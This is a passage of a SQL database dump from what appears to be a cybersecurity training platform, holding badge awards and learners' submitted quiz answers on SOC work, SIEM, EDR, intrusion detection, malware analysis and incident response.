(1707, 232, 737, '2026-03-14', 0, 0, 0, NULL),
(1708, 232, 696, '2026-03-14', 0, 0, 0, NULL),
(1709, 232, 1397, '2026-03-14', 0, 0, 0, NULL),
(1710, 232, 1402, '2026-03-14', 0, 0, 0, NULL),
(1711, 34, 1408, '2026-03-14', 0, 0, 0, NULL),
(1712, 34, 1412, '2026-03-14', 0, 0, 0, NULL),
(1713, 34, 1413, '2026-03-14', 0, 0, 0, NULL),
(1714, 34, 1405, '2026-03-14', 0, 0, 0, NULL),
(1716, 34, 1410, '2026-03-14', 0, 0, 0, NULL),
(1718, 34, 1400, '2026-03-14', 0, 0, 0, NULL),
(1719, 287, 944, '2026-03-14', 0, 0, 0, NULL),
(1720, 287, 852, '2026-03-14', 0, 0, 0, NULL),
(1721, 287, 316, '2026-03-14', 0, 0, 0, NULL),
(1722, 296, 852, '2026-03-14', 1, 0, 0, '2026-03-14 19:34:11'),
(1723, 296, 316, '2026-03-14', 1, 0, 0, '2026-03-14 19:34:11'),
(1724, 296, 944, '2026-03-14', 1, 0, 0, '2026-03-14 19:34:11'),
(1725, 297, 944, '2026-03-14', 1, 0, 0, '2026-03-15 14:47:14'),
(1726, 297, 316, '2026-03-14', 0, 0, 0, NULL),
(1727, 297, 852, '2026-03-14', 1, 0, 0, '2026-03-15 14:50:43'),
(1728, 199, 944, '2026-03-14', 0, 0, 0, NULL),
(1729, 199, 316, '2026-03-14', 0, 0, 0, NULL),
(1730, 199, 852, '2026-03-14', 0, 0, 0, NULL),
(1734, 298, 316, '2026-03-14', 0, 0, 0, NULL),
(1735, 298, 944, '2026-03-14', 0, 0, 0, NULL),
(1736, 298, 852, '2026-03-14', 0, 0, 0, NULL),
(1743, 299, 944, '2026-03-14', 1, 0, 0, '2026-03-15 00:42:22'),
(1744, 299, 316, '2026-03-14', 1, 0, 0, '2026-03-15 00:42:22'),
(1745, 299, 852, '2026-03-14', 1, 0, 0, '2026-03-15 00:42:22'),
(1746, 283, 944, '2026-03-14', 0, 0, 0, NULL),
(1747, 283, 852, '2026-03-14', 0, 0, 0, NULL),
(1748, 283, 659, '2026-03-14', 0, 0, 0, NULL),
(1749, 283, 754, '2026-03-14', 0, 0, 0, NULL),
(1752, 283, 716, '2026-03-14', 0, 0, 0, NULL),
(1753, 283, 696, '2026-03-14', 0, 0, 0, NULL),
(1754, 300, 944, '2026-03-14', 0, 0, 0, NULL),
(1755, 300, 852, '2026-03-14', 0, 0, 0, NULL),
(1756, 300, 316, '2026-03-14', 0, 0, 0, NULL),
(1760, 34, 1410, '2026-03-15', 0, 0, 0, NULL),
(1761, 34, 1409, '2026-03-15', 0, 0, 0, NULL),
(1762, 34, 766, '2026-03-15', 0, 0, 0, NULL),
(1763, 34, 1418, '2026-03-15', 0, 0, 0, NULL),
(1764, 34, 1413, '2026-03-15', 0, 0, 0, NULL),
(1765, 34, 1255, '2026-03-15', 0, 0, 0, NULL),
(1766, 34, 1415, '2026-03-15', 0, 0, 0, NULL),
(1767, 34, 1403, '2026-03-15', 0, 0, 0, NULL),
(1769, 177, 932, '2026-03-15', 1, 0, 0, '2026-03-15 07:28:58'),
(1770, 177, 735, '2026-03-15', 1, 0, 0, '2026-03-15 07:28:58'),
(1771, 177, 716, '2026-03-15', 1, 0, 0, '2026-03-15 07:28:58'),
(1772, 177, 651, '2026-03-15', 1, 0, 0, '2026-03-15 07:28:58'),
(1773, 177, 1042, '2026-03-15', 1, 0, 0, '2026-03-15 07:28:58'),
(1774, 214, 944, '2026-03-15', 0, 0, 0, NULL),
(1775, 214, 852, '2026-03-15', 0, 0, 0, NULL),
(1778, 301, 852, '2026-03-15', 1, 0, 0, '2026-03-15 10:49:24'),
(1779, 301, 944, '2026-03-15', 1, 0, 0, '2026-03-15 10:49:24'),
(1780, 293, 944, '2026-03-15', 1, 0, 0, '2026-03-15 12:18:29'),
(1781, 293, 852, '2026-03-15', 1, 0, 0, '2026-03-15 12:18:29'),
(1782, 297, 944, '2026-03-15', 1, 0, 0, '2026-03-15 14:47:14'),
(1783, 297, 852, '2026-03-15', 1, 0, 0, '2026-03-15 14:50:43'),
(1784, 225, 735, '2026-03-15', 1, 0, 0, '2026-03-15 13:53:32'),
(1785, 225, 834, '2026-03-15', 0, 0, 0, NULL),
(1786, 225, 1043, '2026-03-15', 0, 0, 0, NULL),
(1787, 225, 651, '2026-03-15', 0, 0, 0, NULL),
(1788, 225, 944, '2026-03-15', 0, 0, 0, NULL),
(1790, 232, 652, '2026-03-15', 0, 0, 0, NULL),
(1791, 232, 737, '2026-03-15', 0, 0, 0, NULL),
(1792, 232, 669, '2026-03-15', 0, 0, 0, NULL),
(1793, 232, 656, '2026-03-15', 0, 0, 0, NULL),
(1794, 232, 1403, '2026-03-15', 0, 0, 0, NULL),
(1795, 283, 1708, '2026-03-15', 0, 0, 0, NULL),
(1796, 283, 1681, '2026-03-15', 0, 0, 0, NULL),
(1797, 283, 1690, '2026-03-15', 0, 0, 0, NULL),
(1798, 283, 1687, '2026-03-15', 0, 0, 0, NULL),
(1799, 199, 1691, '2026-03-15', 0, 0, 0, NULL),
(1800, 199, 1664, '2026-03-15', 0, 0, 0, NULL),
(1801, 199, 1657, '2026-03-15', 0, 0, 0, NULL),
(1802, 199, 1679, '2026-03-15', 0, 0, 0, NULL),
(1803, 199, 1651, '2026-03-15', 0, 0, 0, NULL),
(1804, 213, 1654, '2026-03-15', 0, 0, 0, NULL),
(1805, 213, 1665, '2026-03-15', 0, 0, 0, NULL),
(1806, 213, 1651, '2026-03-15', 0, 0, 0, NULL),
(1807, 213, 1691, '2026-03-15', 0, 0, 0, NULL),
(1808, 213, 1695, '2026-03-15', 0, 0, 0, NULL),
(1809, 283, 1712, '2026-03-15', 0, 0, 0, NULL),
(1810, 283, 1665, '2026-03-15', 0, 0, 0, NULL),
(1811, 28, 1650, '2026-03-15', 0, 0, 0, NULL),
(1812, 28, 1681, '2026-03-15', 0, 0, 0, NULL),
(1813, 28, 1672, '2026-03-15', 0, 0, 0, NULL),
(1814, 28, 1662, '2026-03-15', 0, 0, 0, NULL),
(1815, 28, 1684, '2026-03-15', 0, 0, 0, NULL),
(1816, 214, 1682, '2026-03-16', 0, 0, 0, NULL),
(1817, 214, 1649, '2026-03-16', 0, 0, 0, NULL),
(1818, 214, 1694, '2026-03-16', 0, 0, 0, NULL),
(1819, 214, 1678, '2026-03-16', 0, 0, 0, NULL),
(1820, 214, 1676, '2026-03-16', 0, 0, 0, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `user_badges`
--

CREATE TABLE `user_badges` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `badge_id` int(11) NOT NULL,
  `earned_at` timestamp NULL DEFAULT current_timestamp(),
  `awarded_at` datetime DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_badges`
--

INSERT INTO `user_badges` (`id`, `user_id`, `badge_id`, `earned_at`, `awarded_at`) VALUES
(1, 34, 1, '2025-12-26 01:00:05', '2026-01-13 21:26:08'),
(2, 1, 1, '2025-12-26 15:29:20', '2026-01-13 21:26:08'),
(3, 42, 1, '2025-12-30 13:40:31', '2026-01-13 21:26:08'),
(4, 65, 1, '2026-01-06 16:28:31', '2026-01-13 21:26:08'),
(5, 74, 1, '2026-01-12 06:32:13', '2026-01-13 21:26:08'),
(7, 107, 1, '2026-02-02 15:00:17', '2026-02-02 18:00:17'),
(8, 34, 12, '2026-02-05 19:27:03', '2026-02-05 22:27:03'),
(9, 34, 13, '2026-02-05 19:27:03', '2026-02-05 22:27:03'),
(10, 183, 1, '2026-02-20 04:23:32', '2026-02-20 07:23:32'),
(11, 214, 1, '2026-02-27 06:31:25', '2026-02-27 09:31:25'),
(12, 232, 1, '2026-03-03 06:05:08', '2026-03-03 09:05:08'),
(13, 237, 1, '2026-03-04 16:20:30', '2026-03-04 19:20:30'),
(14, 225, 1, '2026-03-05 04:46:03', '2026-03-05 07:46:03'),
(15, 260, 1, '2026-03-07 11:50:16', '2026-03-07 14:50:16'),
(16, 42, 10, '2026-03-12 11:46:50', '2026-03-12 14:46:50'),
(17, 42, 12, '2026-03-12 11:46:50', '2026-03-12 14:46:50'),
(18, 42, 13, '2026-03-12 11:46:50', '2026-03-12 14:46:50'),
(19, 283, 10, '2026-03-12 12:07:05', '2026-03-12 15:07:05'),
(20, 283, 1, '2026-03-12 12:08:06', '2026-03-12 15:08:06'),
(21, 283, 13, '2026-03-12 12:25:44', '2026-03-12 15:25:44'),
(22, 283, 12, '2026-03-12 12:35:34', '2026-03-12 15:35:34'),
(23, 283, 9, '2026-03-12 21:46:42', '2026-03-13 00:46:42'),
(24, 225, 8, '2026-03-13 02:58:27', '2026-03-13 05:58:27'),
(25, 225, 12, '2026-03-13 02:58:27', '2026-03-13 05:58:27'),
(26, 225, 10, '2026-03-15 10:40:40', '2026-03-15 13:40:40'),
(27, 225, 11, '2026-03-15 10:40:40', '2026-03-15 13:40:40'),
(28, 232, 13, '2026-03-15 15:59:21', '2026-03-15 18:59:21'),
(29, 303, 1, '2026-03-15 17:37:43', '2026-03-15 20:37:43'),
(30, 232, 12, '2026-03-15 18:12:05', '2026-03-15 21:12:05'),
(31, 225, 13, '2026-03-16 03:27:16', '2026-03-16 06:27:16');

-- --------------------------------------------------------

--
-- Table structure for table `user_lesson_answers`
--

CREATE TABLE `user_lesson_answers` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `question_id` int(11) NOT NULL,
  `submitted_answer` text DEFAULT NULL,
  `is_correct` tinyint(1) DEFAULT NULL,
  `submitted_at` timestamp NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_lesson_answers`
--

INSERT INTO `user_lesson_answers` (`id`, `user_id`, `question_id`, `submitted_answer`, `is_correct`, `submitted_at`) VALUES
(14, 1, 4164, 'Risk reduction', 1, '2025-12-26 15:29:20'),
(15, 1, 4165, 'SOC team', 1, '2025-12-26 15:29:20'),
(16, 1, 4166, 'Context', 1, '2025-12-26 15:29:20'),
(32, 34, 5522, 'ERROR', 1, '2025-12-26 21:14:00'),
(33, 34, 5523, 'db_admin', 1, '2025-12-26 21:14:00'),
(34, 34, 5524, 'users_db', 1, '2025-12-26 21:14:00'),
(35, 1, 6475, 'Analysis and Context', 1, '2025-12-29 13:52:47'),
(36, 1, 6476, 'A report advising to block an IP due to active ransomware targeting your industry', 1, '2025-12-29 13:53:26'),
(37, 1, 6477, 'To support decision making', 1, '2025-12-29 13:53:26'),
(38, 42, 4164, 'Integrity', 1, '2025-12-30 13:40:30'),
(39, 42, 4165, 'To trick users into revealing information', 1, '2025-12-30 13:40:31'),
(40, 42, 4166, 'SOC Analyst', 1, '2025-12-30 13:40:31'),
(41, 42, 4167, 'Detection', 1, '2025-12-30 13:41:34'),
(42, 42, 4168, 'Threat actor', 1, '2025-12-30 13:41:34'),
(43, 42, 4169, 'High priority', 1, '2025-12-30 13:41:34'),
(44, 42, 4170, 'Log data', 1, '2025-12-30 13:42:10'),
(45, 42, 4171, 'Confirmed threat', 1, '2025-12-30 13:42:10'),
(46, 42, 4172, 'High priority', 1, '2025-12-30 13:42:10'),
(47, 42, 4173, 'Protection', 1, '2025-12-30 13:42:40'),
(48, 42, 4174, 'Detection', 1, '2025-12-30 13:42:40'),
(49, 42, 4175, 'Security tool', 1, '2025-12-30 13:42:40'),
(50, 42, 4176, 'Threat actor', 1, '2025-12-30 13:43:10'),
(51, 42, 4177, 'Log data', 1, '2025-12-30 13:43:10'),
(52, 42, 4178, 'Context', 1, '2025-12-30 13:43:10'),
(53, 42, 5339, 'Network', 1, '2025-12-30 13:45:54'),
(54, 42, 5340, 'Segments', 1, '2025-12-30 13:45:54'),
(55, 42, 5341, 'Presentation', 1, '2025-12-30 13:45:54'),
(56, 42, 5342, 'TCP', 1, '2025-12-30 13:46:37'),
(57, 42, 5343, 'Speed', 1, '2025-12-30 13:46:37'),
(58, 42, 5344, 'Internet', 1, '2025-12-30 13:46:37'),
(59, 42, 5345, '192.168.1.10', 1, '2025-12-30 13:47:41'),
(60, 42, 5346, '32', 1, '2025-12-30 13:47:41'),
(61, 42, 5347, 'NAT', 1, '2025-12-30 13:47:42'),
(62, 42, 5348, '/24', 1, '2025-12-30 13:50:19'),
(63, 42, 5349, '254', 1, '2025-12-30 13:50:19'),
(64, 42, 5350, 'Network ID', 1, '2025-12-30 13:50:19'),
(65, 42, 5351, 'A', 1, '2025-12-30 13:51:39'),
(66, 42, 5352, 'MX', 1, '2025-12-30 13:51:39'),
(67, 42, 5353, 'DNS', 1, '2025-12-30 13:51:39'),
(68, 42, 5354, 'Discover', 1, '2025-12-30 13:52:49'),
(69, 42, 5355, 'IP to MAC', 1, '2025-12-30 13:52:49'),
(70, 42, 5356, 'ARP Spoofing', 1, '2025-12-30 13:52:49'),
(71, 42, 5357, '22', 1, '2025-12-30 13:53:51'),
(72, 42, 5358, 'Telnet', 1, '2025-12-30 13:53:51'),
(73, 42, 5359, 'SMB', 1, '2025-12-30 13:53:51'),
(74, 65, 4164, 'Integrity', 1, '2026-01-06 16:28:30'),
(75, 65, 4165, 'To trick users into revealing information', 1, '2026-01-06 16:28:30'),
(76, 65, 4166, 'SOC Analyst', 1, '2026-01-06 16:28:31'),
(77, 74, 4164, 'Integrity', 1, '2026-01-12 06:32:11'),
(78, 74, 4165, 'To trick users into revealing information', 1, '2026-01-12 06:32:12'),
(79, 74, 4166, 'SOC Analyst', 1, '2026-01-12 06:32:13'),
(80, 74, 5522, 'ERROR', 1, '2026-01-12 06:52:12'),
(81, 74, 5523, 'db_admin', 1, '2026-01-12 06:52:12'),
(82, 74, 5524, 'users_db', 1, '2026-01-12 06:52:12'),
(83, 74, 4167, 'Detection', 1, '2026-01-17 08:38:33'),
(84, 74, 4168, 'Threat actor', 1, '2026-01-17 08:38:33'),
(85, 74, 4169, 'High priority', 1, '2026-01-17 08:38:34'),
(86, 74, 4170, 'Log data', 1, '2026-01-17 08:39:29'),
(87, 74, 4171, 'Confirmed threat', 1, '2026-01-17 08:39:31'),
(88, 74, 4172, 'High priority', 1, '2026-01-17 08:39:31'),
(89, 74, 4173, 'Protection', 1, '2026-01-17 08:40:22'),
(90, 74, 4174, 'Detection', 1, '2026-01-17 08:40:23'),
(91, 74, 4175, 'Security tool', 1, '2026-01-17 08:40:23'),
(92, 74, 4176, 'Threat actor', 1, '2026-01-17 08:41:01'),
(93, 74, 4177, 'Log data', 1, '2026-01-17 08:41:02'),
(94, 74, 4178, 'Context', 1, '2026-01-17 08:41:02'),
(95, 107, 4167, 'Detection', 1, '2026-02-02 15:00:16'),
(96, 107, 4168, 'Threat actor', 1, '2026-02-02 15:00:17'),
(97, 107, 4169, 'High priority', 1, '2026-02-02 15:00:17'),
(98, 107, 4170, 'Log data', 1, '2026-02-02 15:12:43'),
(99, 107, 4171, 'Confirmed threat', 1, '2026-02-02 15:12:43'),
(100, 107, 4172, 'High priority', 1, '2026-02-02 15:12:49'),
(101, 107, 4173, 'Protection', 1, '2026-02-02 15:17:43'),
(102, 107, 4174, 'Detection', 1, '2026-02-02 15:17:43'),
(103, 107, 4175, 'Security tool', 1, '2026-02-02 15:17:43'),
(104, 107, 4176, 'Threat actor', 1, '2026-02-02 15:21:56'),
(105, 107, 4177, 'Log data', 1, '2026-02-02 15:21:56'),
(106, 107, 4178, 'Context', 1, '2026-02-02 15:21:56'),
(107, 107, 4164, 'Integrity', 1, '2026-02-02 15:27:09'),
(108, 107, 4165, 'To trick users into revealing information', 1, '2026-02-02 15:27:10'),
(109, 107, 4166, 'SOC Analyst', 1, '2026-02-02 15:27:10'),
(110, 183, 5522, 'ERROR', 1, '2026-02-20 04:23:32'),
(111, 183, 5523, 'db_admin', 1, '2026-02-20 04:23:32'),
(112, 183, 5524, 'users_db', 1, '2026-02-20 04:23:32'),
(113, 214, 5522, 'ERROR', 1, '2026-02-27 06:31:24'),
(114, 214, 5523, 'db_admin', 1, '2026-02-27 06:31:25'),
(115, 214, 5524, 'users_db', 1, '2026-02-27 06:31:25'),
(116, 214, 5525, '2', 1, '2026-02-27 06:36:06'),
(117, 214, 5526, 'root', 1, '2026-02-27 06:36:06'),
(118, 214, 5527, '2222', 1, '2026-02-27 06:36:06'),
(119, 232, 5881, 'Connecting related events to detect threats', 1, '2026-03-03 06:05:06'),
(120, 232, 5882, 'Compliance and Forensic Investigation', 1, '2026-03-03 06:05:07'),
(121, 232, 5883, 'Forwarder / Agent', 1, '2026-03-03 06:05:07'),
(122, 232, 5884, 'Syslog', 1, '2026-03-04 03:50:28'),
(123, 232, 5885, 'Traffic metadata (Who talked to Whom)', 1, '2026-03-04 03:50:29'),
(124, 232, 5886, 'To accurately correlate events across the world', 1, '2026-03-04 03:50:30'),
(125, 232, 5887, 'Converting mixed formats into a standard field structure', 1, '2026-03-04 03:56:29'),
(126, 232, 5888, 'Maps them to a single field like user.name', 1, '2026-03-04 03:56:29'),
(127, 232, 5889, 'Parsing', 1, '2026-03-04 03:56:30'),
(128, 232, 5890, 'Multiple failed logins in a short time', 1, '2026-03-04 04:43:36'),
(129, 232, 5891, 'Logins from two distant locations in an impossibly short time', 1, '2026-03-04 04:43:37'),
(130, 232, 5892, 'Tuning', 1, '2026-03-04 04:43:37'),
(131, 232, 5893, 'SPL (Search Processing Language)', 1, '2026-03-04 04:44:53'),
(132, 232, 5894, 'KQL (Kusto Query Language)', 1, '2026-03-04 04:44:54'),
(133, 232, 5895, 'High cost', 1, '2026-03-04 04:44:54'),
(134, 232, 5896, 'Kibana', 1, '2026-03-04 04:52:02'),
(135, 232, 5897, 'Elasticsearch', 1, '2026-03-04 04:52:03'),
(136, 232, 5898, 'Lightweight data shippers/agents', 1, '2026-03-04 04:52:03'),
(137, 232, 5899, 'It includes XDR features like FIM and Active Response', 1, '2026-03-04 16:17:54'),
(138, 232, 5900, 'The ability to automatically block/stop a threat', 1, '2026-03-04 16:17:55'),
(139, 232, 5901, 'Yes', 1, '2026-03-04 16:17:55'),
(140, 232, 5902, 'Mapping different log formats to standard fields', 1, '2026-03-04 16:19:05'),
(141, 232, 5903, 'A SIEM is only as good as the log data fed into it', 1, '2026-03-04 16:19:05'),
(142, 232, 5904, 'Logins from two locations physically impossible to traverse in the time', 1, '2026-03-04 16:19:06'),
(143, 232, 5905, 'Splunk', 1, '2026-03-04 16:19:06'),
(144, 232, 5906, 'Microsoft Sentinel', 1, '2026-03-04 16:19:07'),
(145, 232, 5907, 'Wazuh', 1, '2026-03-04 16:19:07'),
(146, 232, 5908, 'Elasticsearch', 0, '2026-03-04 16:19:07'),
(147, 232, 5909, 'Sends logs from the endpoint to the SIEM', 1, '2026-03-04 16:19:08'),
(148, 232, 5910, 'Compliance regulations often require keeping logs for 1 year+', 1, '2026-03-04 16:19:08'),
(149, 237, 4164, 'Integrity', 1, '2026-03-04 16:20:29'),
(150, 237, 4165, 'To trick users into revealing information', 1, '2026-03-04 16:20:30'),
(151, 237, 4166, 'SOC Analyst', 1, '2026-03-04 16:20:30'),
(152, 232, 5911, '192.168.1.55', 1, '2026-03-05 04:02:09'),
(153, 232, 5912, 'Yes, the last log says \"Accepted\"', 1, '2026-03-05 04:02:09'),
(154, 232, 5913, 'root', 1, '2026-03-05 04:02:10'),
(155, 225, 4164, 'Integrity', 1, '2026-03-05 04:46:02'),
(156, 225, 4165, 'To trick users into revealing information', 1, '2026-03-05 04:46:02'),
(157, 225, 4166, 'SOC Analyst', 1, '2026-03-05 04:46:03'),
(158, 225, 4167, 'Detection', 1, '2026-03-05 04:49:20'),
(159, 225, 4168, 'Threat actor', 1, '2026-03-05 04:49:21'),
(160, 225, 4169, 'High priority', 1, '2026-03-05 04:49:21'),
(161, 225, 4170, 'Log data', 1, '2026-03-05 04:53:12'),
(162, 225, 4171, 'Confirmed threat', 1, '2026-03-05 04:53:12'),
(163, 225, 4172, 'High priority', 1, '2026-03-05 04:53:12'),
(164, 225, 4173, 'Protection', 1, '2026-03-05 04:55:04'),
(165, 225, 4174, 'Detection', 1, '2026-03-05 04:55:05'),
(166, 225, 4175, 'Security tool', 1, '2026-03-05 04:55:05'),
(167, 225, 4176, 'Threat actor', 1, '2026-03-05 04:56:37'),
(168, 225, 4177, 'Log data', 1, '2026-03-05 04:56:37'),
(169, 225, 4178, 'Context', 1, '2026-03-05 04:56:38'),
(170, 232, 5914, '5 Minutes', 1, '2026-03-05 05:26:13'),
(171, 232, 5915, 'Machines are precise, humans are random', 1, '2026-03-05 05:26:13'),
(172, 232, 5916, '45.33.2.1', 1, '2026-03-05 05:26:14'),
(173, 232, 5917, '1 hour 15 minutes', 1, '2026-03-05 05:30:24'),
(174, 232, 5918, 'alice@company.com', 1, '2026-03-05 05:30:25'),
(175, 232, 5919, 'Credential Theft', 1, '2026-03-05 05:30:25'),
(176, 260, 4164, 'Integrity', 1, '2026-03-07 11:50:14'),
(177, 260, 4165, 'To trick users into revealing information', 1, '2026-03-07 11:50:15'),
(178, 260, 4166, 'SOC Analyst', 1, '2026-03-07 11:50:15'),
(179, 232, 5920, 'Domain Admins', 1, '2026-03-07 15:09:28'),
(180, 232, 5921, '4728', 1, '2026-03-07 15:09:29'),
(181, 232, 5922, 'Off-hours changes are suspicious', 1, '2026-03-07 15:09:29'),
(182, 232, 5923, 'Exfiltrated Data (Encoded)', 1, '2026-03-08 09:13:56'),
(183, 232, 5924, 'Firewalls usually allow Port 53 (DNS) outbound', 1, '2026-03-08 09:13:57'),
(184, 232, 5925, 'Length and High Entropy (Randomness)', 1, '2026-03-08 09:13:57'),
(185, 260, 4167, 'Detection', 1, '2026-03-08 09:14:30'),
(186, 260, 4168, 'Threat actor', 1, '2026-03-08 09:14:31'),
(187, 260, 4169, 'High priority', 1, '2026-03-08 09:14:31'),
(188, 232, 5926, 'Updating', 0, '2026-03-08 09:15:33'),
(189, 232, 5927, 'BLOCK', 1, '2026-03-08 09:15:33'),
(190, 232, 5928, '4624', 1, '2026-03-08 09:15:33'),
(191, 232, 5929, '02:00 AM', 1, '2026-03-08 09:15:34'),
(192, 232, 5930, 'A \"Success\" or \"Accepted\" log after failures', 1, '2026-03-08 09:15:34'),
(193, 232, 5931, 'Regular time intervals (Heartbeat)', 1, '2026-03-08 09:15:34'),
(194, 260, 4170, 'Log data', 1, '2026-03-08 09:33:21'),
(195, 260, 4171, 'Confirmed threat', 1, '2026-03-08 09:33:22'),
(196, 260, 4172, 'High priority', 1, '2026-03-08 09:33:22'),
(197, 260, 4173, 'Protection', 1, '2026-03-08 09:46:04'),
(198, 260, 4174, 'Detection', 1, '2026-03-08 09:46:05'),
(199, 260, 4175, 'Security tool', 1, '2026-03-08 09:46:05'),
(200, 232, 5932, 'Endpoint activities (Processes, Files, Network)', 1, '2026-03-08 09:47:56'),
(201, 232, 5933, 'Isolating a machine from the network', 1, '2026-03-08 09:47:56'),
(202, 232, 5934, 'On each endpoint (laptop/server)', 1, '2026-03-08 09:47:56'),
(203, 232, 5935, 'Signatures (File Hashes)', 1, '2026-03-08 09:50:03'),
(204, 232, 5936, 'Zero-Day', 1, '2026-03-08 09:50:03'),
(205, 232, 5937, 'Full context and telemetry (Process Tree, etc.)', 1, '2026-03-08 09:50:04'),
(206, 260, 4176, 'Threat actor', 1, '2026-03-08 09:56:55'),
(207, 260, 4177, 'Log data', 1, '2026-03-08 09:56:56'),
(208, 260, 4178, 'Context', 1, '2026-03-08 09:56:56'),
(209, 232, 5938, 'Which process started which other process', 1, '2026-03-08 10:16:48'),
(210, 232, 5939, 'explorer.exe', 1, '2026-03-08 10:16:49'),
(211, 232, 5940, 'Office apps should not spawn shells', 1, '2026-03-08 10:16:49'),
(212, 232, 5941, 'services.exe', 1, '2026-03-08 10:18:45'),
(213, 232, 5942, 'A malicious VBA Macro', 1, '2026-03-08 10:18:45'),
(214, 232, 5943, 'Base64-encoded script (often malicious)', 1, '2026-03-08 10:18:46'),
(215, 232, 5944, 'The Office application (Word/Excel)', 1, '2026-03-08 10:21:32'),
(216, 232, 5945, 'Using built-in tools (PowerShell, WMI) instead of malware', 1, '2026-03-08 10:21:32'),
(217, 232, 5946, 'It can download files (LOLBIN)', 1, '2026-03-08 10:21:33'),
(218, 232, 5947, 'CrowdStrike', 1, '2026-03-08 10:35:48'),
(219, 232, 5948, 'Microsoft Defender for Endpoint', 1, '2026-03-08 10:35:48'),
(220, 232, 5949, 'SentinelOne', 1, '2026-03-08 10:35:48'),
(221, 232, 5950, 'WINWORD.EXE', 1, '2026-03-08 10:37:51'),
(222, 232, 5951, 'A malicious email attachment (phishing)', 1, '2026-03-08 10:37:51'),
(223, 232, 5952, 'Reconnaissance / Discovery', 1, '2026-03-08 10:37:51'),
(224, 232, 5953, 'Base64-encoded command (obfuscation)', 1, '2026-03-08 10:37:52'),
(225, 232, 5954, 'EDR provides visibility and behavior analysis', 1, '2026-03-08 10:37:55'),
(226, 232, 5955, 'winlogon.exe', 0, '2026-03-08 10:37:56'),
(227, 232, 5956, 'At network choke points (e.g., behind firewall)', 1, '2026-03-08 11:26:57'),
(228, 232, 5957, 'Blind to encrypted traffic (TLS)', 1, '2026-03-08 11:26:58'),
(229, 232, 5958, 'OSSEC / Wazuh', 1, '2026-03-08 11:26:58'),
(230, 232, 5959, 'Cannot detect Zero-Day (unknown) attacks', 1, '2026-03-08 14:19:54'),
(231, 232, 5960, 'Baseline', 1, '2026-03-08 14:19:55'),
(232, 232, 5961, 'Anomaly-Based', 1, '2026-03-08 14:19:55'),
(233, 232, 5962, 'Signature ID', 1, '2026-03-08 14:25:48'),
(234, 232, 5963, 'Logs and generates an alert', 1, '2026-03-08 14:25:48'),
(235, 232, 5964, '-> (Arrow)', 1, '2026-03-08 14:25:48'),
(236, 232, 5965, 'Multi-threading (uses all CPU cores)', 1, '2026-03-08 14:33:26'),
(237, 232, 5966, 'Yes', 1, '2026-03-08 14:33:27'),
(238, 232, 5967, 'Saves suspicious files from network traffic', 1, '2026-03-08 14:33:27'),
(239, 232, 5968, 'Read the alert message to understand the claim', 1, '2026-03-08 14:46:02'),
(240, 232, 5969, 'Scanners like Nessus trigger \"Port Scan\" rules', 1, '2026-03-08 14:46:02'),
(241, 232, 5970, 'Adjusting it to reduce false positives', 1, '2026-03-08 14:46:03'),
(242, 232, 5971, 'HIDS', 0, '2026-03-08 14:47:30'),
(243, 232, 5972, 'HIDS', 1, '2026-03-08 14:47:30'),
(244, 232, 5973, 'A database of known attack patterns', 1, '2026-03-08 14:47:31'),
(245, 232, 5974, 'Zero-Day attacks', 1, '2026-03-08 14:47:31'),
(246, 232, 5975, 'Suricata', 1, '2026-03-08 14:47:32'),
(247, 232, 5976, 'The alert message text', 1, '2026-03-08 14:47:32'),
(248, 232, 5977, 'Ransomware', 1, '2026-03-09 13:56:57'),
(249, 232, 5978, 'Worms spread without user interaction', 1, '2026-03-09 13:56:58'),
(250, 232, 5979, 'Malware that lives in RAM, not on disk', 1, '2026-03-09 13:56:58'),
(251, 232, 5980, 'Examining malware without executing it', 1, '2026-03-09 13:58:27'),
(252, 232, 5981, 'Sandbox escape', 1, '2026-03-09 13:58:28'),
(253, 232, 5982, 'strings command', 1, '2026-03-09 13:58:28'),
(254, 232, 5983, 'To prevent the malware from reaching the internet', 1, '2026-03-09 14:00:36'),
(255, 232, 5984, 'A pre-configured Windows VM for malware analysis', 1, '2026-03-09 14:00:36'),
(256, 232, 5985, 'Take a snapshot', 1, '2026-03-09 14:00:37'),
(257, 232, 5986, 'The file is packed or encrypted', 1, '2026-03-09 14:03:32'),
(258, 232, 5987, 'Memory allocation for code injection', 1, '2026-03-09 14:03:32'),
(259, 232, 5988, 'To check VirusTotal for known info', 1, '2026-03-09 14:03:33'),
(260, 232, 5989, 'Interactive malware sandboxing', 1, '2026-03-09 14:04:51'),
(261, 232, 5990, 'Persistence (auto-start)', 1, '2026-03-09 14:04:52'),
(262, 232, 5991, 'Looking for VM artifacts or lack of user activity', 1, '2026-03-09 14:04:52'),
(263, 232, 5992, 'Indicators of Compromise', 1, '2026-03-09 14:12:49'),
(264, 232, 5993, 'A unique name to prevent multiple instances', 1, '2026-03-09 14:12:50'),
(265, 232, 5994, 'MITRE ATT&CK', 1, '2026-03-09 14:12:50'),
(266, 232, 5995, 'Rootkit', 1, '2026-03-09 14:13:35'),
(267, 232, 5996, 'RAT (Remote Access Trojan)', 1, '2026-03-09 14:13:35'),
(268, 232, 5997, 'Dynamic Analysis', 1, '2026-03-09 14:13:35'),
(269, 232, 5998, 'Dynamic Analysis', 0, '2026-03-09 14:13:36'),
(270, 232, 5999, 'Windows PE (Executable) files', 1, '2026-03-09 14:13:36'),
(271, 232, 6000, 'Evading sandbox analysis', 1, '2026-03-09 14:13:37'),
(272, 232, 6004, '4', 1, '2026-03-09 17:37:39'),
(273, 232, 6005, 'Containment, Eradication & Recovery', 1, '2026-03-09 17:37:40'),
(274, 232, 6006, 'Loop back to Preparation (improvement)', 1, '2026-03-09 17:37:40'),
(275, 232, 6007, 'A step-by-step guide for handling specific incidents', 1, '2026-03-09 17:54:55'),
(276, 232, 6008, 'Pre-packed forensic tools for on-site response', 1, '2026-03-09 17:54:55'),
(277, 232, 6009, 'To know what normal looks like', 1, '2026-03-09 17:54:56'),
(278, 232, 6010, 'Validate if it is a True Positive', 1, '2026-03-09 18:04:04'),
(279, 232, 6011, 'A timeline of events', 1, '2026-03-09 18:04:04'),
(280, 232, 6012, 'FBI, vendor, or partner', 1, '2026-03-09 18:04:04'),
(281, 232, 6013, 'Immediate actions to stop the attack', 1, '2026-03-09 18:05:07'),
